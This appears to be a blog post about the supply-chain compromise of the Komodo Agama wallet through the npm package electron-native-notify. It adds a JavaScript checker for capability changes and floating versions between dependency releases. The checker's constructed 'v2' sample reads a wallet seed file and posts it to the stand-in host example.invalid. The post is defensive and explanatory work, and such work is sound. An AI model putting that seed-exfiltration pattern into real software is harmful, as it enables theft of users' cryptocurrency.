Komodo - unique security vulnerability

in #security, 5 years ago

There is peculiar news that Komodo "hacked itself" to get ahead of an attacker.

From Komodo: https://support.komodoplatform.com/support/solutions/articles/29000029932-agama-security-announcement

On Wednesday the 5th of June, the Komodo team were made aware of an issue with the Agama wallet that potentially put some users' funds at risk. Details and a timeline of events will be published once the necessary steps have been taken to secure funds and fix the problem.

After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk. We were able to sweep around 8 million KMD and 96 BTC from the vulnerable wallets, which otherwise would have been easy pickings for the attacker. The safe wallets RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF (KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC) are under the control of the Komodo Team, and assets can be reclaimed by their owners. See our support page article for details.

The attack is a software supply-chain compromise, in the same family as the backdoored CCleaner installer [https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html] and the typosquatted packages found on the PyPI Python repository [https://nakedsecurity.sophos.com/2017/09/19/pypi-python-repository-hit-by-typosquatting-sneak-attack/]. The difference here is that the poisoned component was not a look-alike: it was a dependency the wallet already used.

In this case the npm package electron-native-notify, a dependency of the Agama wallet, was turned against it. As the npm write-up describes, the package was first published without any malicious code and only later received a release carrying logic to capture wallet seeds and send them out, so a one-time review of the dependency at the moment it was added would have found nothing. With the number of packages and releases flowing through npm, it takes a hawk's eye to notice a change like this; in practice it means pinning exact versions and reviewing what actually changed before a dependency update reaches a build.

More details are in the npm security team's blog post: http://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm
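As an added illustration (this is not code from Komodo, Agama or npm), the script below shows the two checks a practitioner would want against a dependency like this one: a "capability diff" between two releases of a package, which surfaces a release that suddenly gains network, filesystem or environment access while keeping the same API, and a scan of package.json for floating version ranges that would pull such a release in automatically. The two package sources, the package name "some-notify-wrapper" and the package.json are constructed samples, not the real electron-native-notify code.

```javascript
// Added example, not project code. The sources below are CONSTRUCTED samples
// standing in for two releases of an npm dependency; they are not the real
// electron-native-notify payload.

// Cheap, regex-level capability indicators. Good enough to flag a release that
// grows teeth; an obfuscated payload can evade them (see the note on hex/base64).
const INDICATORS = {
  "net:http(s)":        /\brequire\(\s*["'](?:node:)?https?["']\s*\)/,
  "net:dns":            /\brequire\(\s*["'](?:node:)?dns["']\s*\)/,
  "exec:child_process": /\brequire\(\s*["'](?:node:)?child_process["']\s*\)/,
  "fs":                 /\brequire\(\s*["'](?:node:)?fs["']\s*\)/,
  "env":                /\bprocess\.env\b/,
  "eval":               /\beval\s*\(|new\s+Function\s*\(/,
  "encoded-blob":       /["'][A-Za-z0-9+/=]{64,}["']/,     // long base64-ish literal
  "hex-escapes":        /(?:\\x[0-9a-fA-F]{2}){8,}/,        // string built from \xNN bytes
};

// Which indicators fire in a given source text, sorted for stable comparison.
function extractCapabilities(source) {
  return Object.entries(INDICATORS)
    .filter(([, re]) => re.test(source))
    .map(([name]) => name)
    .sort();
}

// Capabilities gained and lost between two releases of the same package.
function capabilityDiff(oldSource, newSource) {
  const before = new Set(extractCapabilities(oldSource));
  const after = new Set(extractCapabilities(newSource));
  return {
    added: [...after].filter((c) => !before.has(c)),
    removed: [...before].filter((c) => !after.has(c)),
  };
}

// Verdict for an upgrade: any newly gained network, exec, eval or env access
// is worth a human look before the new version reaches a build.
function reviewUpgrade(oldSource, newSource) {
  const { added } = capabilityDiff(oldSource, newSource);
  const flag = added.some((c) => /^(net|exec|eval)/.test(c) || c === "env");
  return { added, flag };
}

// Constructed v1: a plausible, benign notification helper.
const V1_SRC = `
const notifier = require("node-notifier");
module.exports = function notify(title, body) {
  notifier.notify({ title, message: body });
};
`;

// Constructed v2: identical public API, but now reads a file and phones home.
const V2_SRC = `
const notifier = require("node-notifier");
const https = require("https");
const fs = require("fs");
function phoneHome(payload) {
  const req = https.request({ host: "example.invalid", method: "POST", path: "/" });
  req.end(Buffer.from(JSON.stringify(payload)).toString("base64"));
}
module.exports = function notify(title, body) {
  try { phoneHome({ seed: fs.readFileSync(process.env.HOME + "/.wallet/seed", "utf8") }); } catch (e) {}
  notifier.notify({ title, message: body });
};
`;

// Constructed manifest. Caret/tilde ranges let a plain "npm install" resolve a
// newer, unreviewed release of a dependency without any change to this file.
const PKG_JSON = {
  dependencies: {
    "node-notifier": "5.4.0",
    "some-notify-wrapper": "^1.1.0",   // hypothetical package name, floating range
    "left-pad": "~1.3.0",
  },
};

// Dependencies whose range is anything other than one exact x.y.z version.
function floatingRanges(pkg) {
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  return Object.entries(deps)
    .filter(([, range]) => !/^\d+\.\d+\.\d+$/.test(range))
    .map(([name, range]) => `${name}@${range}`)
    .sort();
}

console.log(reviewUpgrade(V1_SRC, V2_SRC));
console.log(floatingRanges(PKG_JSON));
```

Two caveats. The indicators are deliberately simple and a payload assembled from hex escapes or decoded at runtime will slip past most of them, which is why the "encoded-blob" and "hex-escapes" rules exist and why a flagged diff is a prompt for review rather than a verdict. Exact pins and a committed package-lock.json only help if the build installs from the lockfile (`npm ci` rather than `npm install`) and someone actually reads the diff when the lock changes.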

If you are holding Komodo

Check the balance of any wallet you used with Agama. If funds are missing, they may have been swept to the Komodo team's safe wallets listed above; the reclaim procedure is in the support article: https://support.komodoplatform.com/support/solutions/articles/29000029932-agama-security-announcement


This post has been rewarded with a 100% upvote from the @indiaunited Community account. We are happy to have you as one of the valuable members of the community.

If you would like to delegate to @IndiaUnited you can do so by clicking on the following links: 5SP, 10SP, 15SP, 20SP 25SP, 50SP, 100SP, 250SP. Be sure to leave at least 50SP undelegated on your account.

Please contribute to the community by upvoting this comment and posts made by @indiaunited.

I hope that the cyber security team can overcome this problem; we really hope for it.
